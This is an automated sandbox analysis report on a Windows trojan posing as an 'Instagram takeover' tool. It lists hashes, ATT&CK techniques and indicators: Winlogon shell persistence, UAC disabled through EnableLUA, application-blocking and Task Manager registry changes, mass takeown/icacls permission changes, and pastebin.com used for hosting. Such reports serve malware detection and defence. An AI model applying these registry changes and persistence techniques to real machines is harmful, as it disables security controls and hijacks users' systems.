6f712342bf83b7a44dbad03c96e09f9455e0d159eed5223dbabebedf94c15e50

Analysis

max time kernel
28s
max time network
30s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
26-11-2024 09:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Insta乗っ取り.exe
Size

12.5MB
MD5

2ca14730747a21ef9a993ec1191504f1
SHA1

f62b6796399b90d5864d73d4b1a8c3f26c727a0c
SHA256

6f712342bf83b7a44dbad03c96e09f9455e0d159eed5223dbabebedf94c15e50
SHA512

8d7fdebb474792efdbef07b6f7327a3cf38796106162d0ad254c63c56fc0322e63b0656fbe7fa073ecb3f12cfdb99a31227d902d2990a91094c5c8f5ef768b20
SSDEEP

393216:Rxo6cAJGkrybt8Ku6RtUUqWOBGFXiR3Zr:7o6cerybt8K/PU9WO0FXiR3Z

Score

10^/10

defense_evasion discovery evasion execution exploit persistence privilege_escalation trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Insta乗っ取り.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Windows\\System32\\Insta乗っ取り.exe"	Insta乗っ取り.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Blocks application from running via registry modification 64 IoCs

Adds application to list of disallowed applications.

evasion

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 64 IoCs

exploit

Processes:

takeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	Process
5696	takeown.exe
5844	icacls.exe
6560	takeown.exe
2176	takeown.exe
7788	icacls.exe
4068	takeown.exe
5824	icacls.exe
6928
5152
6900	icacls.exe
2260	takeown.exe
6388
1096	takeown.exe
4936	takeown.exe
2352	icacls.exe
3848	takeown.exe
4316	icacls.exe
7008
4308	takeown.exe
3460	takeown.exe
7644	icacls.exe
5208	icacls.exe
852	icacls.exe
6636
1416	takeown.exe
1508	icacls.exe
4976	icacls.exe
4688
2176
420	takeown.exe
6356	icacls.exe
5328
3392
6400	takeown.exe
4296
7748	takeown.exe
7136	takeown.exe
6992
1672	takeown.exe
7820
6904
2312	takeown.exe
6880	icacls.exe
6268
4264	icacls.exe
5732	icacls.exe
7820	icacls.exe
7896
3428
7532
4324
5468	takeown.exe
3404	icacls.exe
6344
5836
5928
2396	icacls.exe
5876	takeown.exe
2256
2112	takeown.exe
1096	takeown.exe
2392	takeown.exe
6072	takeown.exe
6768	takeown.exe

Executes dropped EXE 3 IoCs

Processes:

Insta乗っ取り.exeInsta乗っ取り.exeInsta乗っ取り.exe

pid	Process
1692	Insta乗っ取り.exe
1792	Insta乗っ取り.exe
3880	Insta乗っ取り.exe

Loads dropped DLL 34 IoCs

Processes:

Insta乗っ取り.exeInsta乗っ取り.exe

pid	Process
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
1692	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe
3880	Insta乗っ取り.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exe

pid	Process
5880
4308	icacls.exe
5052	icacls.exe
4296
1916
7048
7808	takeown.exe
4700	icacls.exe
6636	icacls.exe
6140
1532
5824	icacls.exe
7184	icacls.exe
5328
8120
4340
1916	takeown.exe
6976
1096
8032	icacls.exe
4744	icacls.exe
7360	icacls.exe
4800	takeown.exe
2936	takeown.exe
5568	takeown.exe
7240	takeown.exe
6004	icacls.exe
6224
6680
7944	takeown.exe
7864	icacls.exe
1348	takeown.exe
6636
6652
356	takeown.exe
5732	icacls.exe
5688
7996	takeown.exe
5360
5916
6312
3612	takeown.exe
5828	icacls.exe
6504
6676	icacls.exe
6268
8124	icacls.exe
1376
8028
7336	takeown.exe
420	takeown.exe
856	icacls.exe
7924	takeown.exe
2256
5748
3968	icacls.exe
3404	icacls.exe
7796	takeown.exe
5876	takeown.exe
7268
5960	takeown.exe
7644	icacls.exe
5208	icacls.exe
4468

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
1	pastebin.com
2	pastebin.com
4	pastebin.com

Drops file in System32 directory 2 IoCs

Processes:

Insta乗っ取り.exe

description	ioc	Process
File created	C:\Windows\System32\Insta乗っ取り.exe	Insta乗っ取り.exe
File opened for modification	C:\Windows\System32\Insta乗っ取り.exe	Insta乗っ取り.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2224	powershell.exe
4456	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Screensaver 1 TTPs 5 IoCs

Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

persistence privilege_escalation

Screensaver

T1546.002

Processes:

reg.exereg.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\ScreenSaveActive = "1"
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0"
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\ScreenSaveActive = "1"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\ScreenSaverIsSecure = "1"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\System32\\Mystify.scr"

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2224	powershell.exe
2224	powershell.exe
2224	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Insta乗っ取り.exepowershell.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeInsta乗っ取り.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepowershell.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	Process
Token: SeDebugPrivilege	1692	Insta乗っ取り.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeTakeOwnershipPrivilege	4088	takeown.exe
Token: SeTakeOwnershipPrivilege	5104	takeown.exe
Token: SeTakeOwnershipPrivilege	1268	takeown.exe
Token: SeTakeOwnershipPrivilege	1096	takeown.exe
Token: SeTakeOwnershipPrivilege	4716	takeown.exe
Token: SeTakeOwnershipPrivilege	920	takeown.exe
Token: SeDebugPrivilege	3880	Insta乗っ取り.exe
Token: SeTakeOwnershipPrivilege	1944	takeown.exe
Token: SeTakeOwnershipPrivilege	1416	takeown.exe
Token: SeTakeOwnershipPrivilege	1524	takeown.exe
Token: SeTakeOwnershipPrivilege	2312	takeown.exe
Token: SeTakeOwnershipPrivilege	2392	takeown.exe
Token: SeTakeOwnershipPrivilege	3700	takeown.exe
Token: SeTakeOwnershipPrivilege	2112	takeown.exe
Token: SeTakeOwnershipPrivilege	1728	takeown.exe
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeTakeOwnershipPrivilege	4308	takeown.exe
Token: SeTakeOwnershipPrivilege	6804	takeown.exe
Token: SeTakeOwnershipPrivilege	3692	takeown.exe
Token: SeTakeOwnershipPrivilege	7304	takeown.exe
Token: SeTakeOwnershipPrivilege	2064	takeown.exe
Token: SeTakeOwnershipPrivilege	1916	takeown.exe
Token: SeTakeOwnershipPrivilege	6416	takeown.exe
Token: SeTakeOwnershipPrivilege	4732	takeown.exe
Token: SeTakeOwnershipPrivilege	7808	takeown.exe
Token: SeTakeOwnershipPrivilege	2176	takeown.exe
Token: SeTakeOwnershipPrivilege	7336	takeown.exe
Token: SeTakeOwnershipPrivilege	7008	takeown.exe
Token: SeTakeOwnershipPrivilege	3136	takeown.exe
Token: SeTakeOwnershipPrivilege	356	takeown.exe
Token: SeTakeOwnershipPrivilege	6760	takeown.exe
Token: SeTakeOwnershipPrivilege	2936	takeown.exe
Token: SeTakeOwnershipPrivilege	7756	takeown.exe
Token: SeTakeOwnershipPrivilege	6800	takeown.exe
Token: SeTakeOwnershipPrivilege	2428	takeown.exe
Token: SeTakeOwnershipPrivilege	7252	takeown.exe
Token: SeTakeOwnershipPrivilege	3460	takeown.exe
Token: SeTakeOwnershipPrivilege	7144	takeown.exe
Token: SeTakeOwnershipPrivilege	5468	takeown.exe
Token: SeTakeOwnershipPrivilege	7796	takeown.exe
Token: SeTakeOwnershipPrivilege	4936	takeown.exe
Token: SeTakeOwnershipPrivilege	5536	takeown.exe
Token: SeTakeOwnershipPrivilege	6076	takeown.exe
Token: SeTakeOwnershipPrivilege	1348	takeown.exe
Token: SeTakeOwnershipPrivilege	7924	takeown.exe
Token: SeTakeOwnershipPrivilege	2260	takeown.exe
Token: SeTakeOwnershipPrivilege	356	takeown.exe
Token: SeTakeOwnershipPrivilege	5876	takeown.exe
Token: SeTakeOwnershipPrivilege	6560	takeown.exe
Token: SeTakeOwnershipPrivilege	2544	takeown.exe
Token: SeTakeOwnershipPrivilege	3884	takeown.exe
Token: SeTakeOwnershipPrivilege	3608	takeown.exe
Token: SeTakeOwnershipPrivilege	5856	takeown.exe
Token: SeTakeOwnershipPrivilege	4316	takeown.exe
Token: SeTakeOwnershipPrivilege	7148	takeown.exe
Token: SeTakeOwnershipPrivilege	7708	takeown.exe
Token: SeTakeOwnershipPrivilege	6628	takeown.exe
Token: SeTakeOwnershipPrivilege	4800	takeown.exe
Token: SeTakeOwnershipPrivilege	5892	takeown.exe
Token: SeTakeOwnershipPrivilege	7388
Token: SeTakeOwnershipPrivilege	5876	takeown.exe
Token: SeTakeOwnershipPrivilege	488

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Insta乗っ取り.exeInsta乗っ取り.execmd.execmd.execmd.execmd.execmd.execmd.exeInsta乗っ取り.execmd.execmd.exe

description	pid	Process	procid_target
PID 2332 wrote to memory of 1692	2332	Insta乗っ取り.exe	79
PID 2332 wrote to memory of 1692	2332	Insta乗っ取り.exe	79
PID 1692 wrote to memory of 856	1692	Insta乗っ取り.exe	81
PID 1692 wrote to memory of 856	1692	Insta乗っ取り.exe	81
PID 1692 wrote to memory of 2224	1692	Insta乗っ取り.exe	83
PID 1692 wrote to memory of 2224	1692	Insta乗っ取り.exe	83
PID 1692 wrote to memory of 3984	1692	Insta乗っ取り.exe	85
PID 1692 wrote to memory of 3984	1692	Insta乗っ取り.exe	85
PID 3984 wrote to memory of 1392	3984	cmd.exe	87
PID 3984 wrote to memory of 1392	3984	cmd.exe	87
PID 1692 wrote to memory of 2944	1692	Insta乗っ取り.exe	88
PID 1692 wrote to memory of 2944	1692	Insta乗っ取り.exe	88
PID 1692 wrote to memory of 4620	1692	Insta乗っ取り.exe	90
PID 1692 wrote to memory of 4620	1692	Insta乗っ取り.exe	90
PID 1692 wrote to memory of 4820	1692	Insta乗っ取り.exe	92
PID 1692 wrote to memory of 4820	1692	Insta乗っ取り.exe	92
PID 1692 wrote to memory of 4476	1692	Insta乗っ取り.exe	94
PID 1692 wrote to memory of 4476	1692	Insta乗っ取り.exe	94
PID 1692 wrote to memory of 996	1692	Insta乗っ取り.exe	96
PID 1692 wrote to memory of 996	1692	Insta乗っ取り.exe	96
PID 1692 wrote to memory of 3168	1692	Insta乗っ取り.exe	98
PID 1692 wrote to memory of 3168	1692	Insta乗っ取り.exe	98
PID 1692 wrote to memory of 3820	1692	Insta乗っ取り.exe	100
PID 1692 wrote to memory of 3820	1692	Insta乗っ取り.exe	100
PID 1692 wrote to memory of 4416	1692	Insta乗っ取り.exe	102
PID 1692 wrote to memory of 4416	1692	Insta乗っ取り.exe	102
PID 1692 wrote to memory of 5108	1692	Insta乗っ取り.exe	104
PID 1692 wrote to memory of 5108	1692	Insta乗っ取り.exe	104
PID 1692 wrote to memory of 420	1692	Insta乗っ取り.exe	106
PID 1692 wrote to memory of 420	1692	Insta乗っ取り.exe	106
PID 1692 wrote to memory of 1972	1692	Insta乗っ取り.exe	108
PID 1692 wrote to memory of 1972	1692	Insta乗っ取り.exe	108
PID 1692 wrote to memory of 1144	1692	Insta乗っ取り.exe	110
PID 1692 wrote to memory of 1144	1692	Insta乗っ取り.exe	110
PID 1692 wrote to memory of 1304	1692	Insta乗っ取り.exe	113
PID 1692 wrote to memory of 1304	1692	Insta乗っ取り.exe	113
PID 1304 wrote to memory of 4088	1304	cmd.exe	115
PID 1304 wrote to memory of 4088	1304	cmd.exe	115
PID 1692 wrote to memory of 1044	1692	Insta乗っ取り.exe	116
PID 1692 wrote to memory of 1044	1692	Insta乗っ取り.exe	116
PID 1044 wrote to memory of 5104	1044	cmd.exe	118
PID 1044 wrote to memory of 5104	1044	cmd.exe	118
PID 1692 wrote to memory of 3760	1692	Insta乗っ取り.exe	119
PID 1692 wrote to memory of 3760	1692	Insta乗っ取り.exe	119
PID 3760 wrote to memory of 1268	3760	cmd.exe	1043
PID 3760 wrote to memory of 1268	3760	cmd.exe	1043
PID 1692 wrote to memory of 3156	1692	Insta乗っ取り.exe	304
PID 1692 wrote to memory of 3156	1692	Insta乗っ取り.exe	304
PID 3156 wrote to memory of 1096	3156	cmd.exe	1805
PID 3156 wrote to memory of 1096	3156	cmd.exe	1805
PID 1692 wrote to memory of 2164	1692	Insta乗っ取り.exe	1493
PID 1692 wrote to memory of 2164	1692	Insta乗っ取り.exe	1493
PID 2164 wrote to memory of 4716	2164	cmd.exe	1398
PID 2164 wrote to memory of 4716	2164	cmd.exe	1398
PID 1792 wrote to memory of 3880	1792	Insta乗っ取り.exe	122
PID 1792 wrote to memory of 3880	1792	Insta乗っ取り.exe	122
PID 1692 wrote to memory of 1344	1692	Insta乗っ取り.exe	129
PID 1692 wrote to memory of 1344	1692	Insta乗っ取り.exe	129
PID 1344 wrote to memory of 920	1344	cmd.exe	965
PID 1344 wrote to memory of 920	1344	cmd.exe	965
PID 1692 wrote to memory of 3716	1692	Insta乗っ取り.exe	221
PID 1692 wrote to memory of 3716	1692	Insta乗っ取り.exe	221
PID 3716 wrote to memory of 1944	3716	cmd.exe	1401
PID 3716 wrote to memory of 1944	3716	cmd.exe	1401

C:\Users\Admin\AppData\Local\Temp\Insta乗っ取り.exe
"C:\Users\Admin\AppData\Local\Temp\Insta乗っ取り.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2332
- C:\Users\Admin\AppData\Local\Temp\onefile_2332_133770885283751551\Insta乗っ取り.exe
  C:\Users\Admin\AppData\Local\Temp\Insta乗っ取り.exe
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
